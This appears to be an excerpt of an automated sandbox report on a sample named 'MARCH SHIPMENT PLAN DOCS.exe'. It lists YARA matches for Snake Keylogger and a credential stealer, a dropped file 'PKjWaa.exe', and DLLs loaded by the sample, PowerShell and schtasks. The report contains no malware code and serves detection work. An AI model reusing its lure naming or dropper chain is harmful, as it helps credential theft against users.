Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B0007 | 20_2_069B0007 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B1841 | 20_2_069B1841 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B0040 | 20_2_069B0040 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BF071 | 20_2_069BF071 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069B5138 | 20_2_069B5138 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BF930 | 20_2_069BF930 |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Code function: 20_2_069BF922 | 20_2_069BF922 |
Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 00000014.00000002.3702397792.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: PKjWaa.exe PID: 7948, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: dwrite.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: textshaping.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: windowscodecs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: iconcodecservice.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: rasapi32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: rasman.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: rtutils.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: dhcpcsvc6.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: dhcpcsvc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Section loaded: schannel.dll | Jump to behavior |
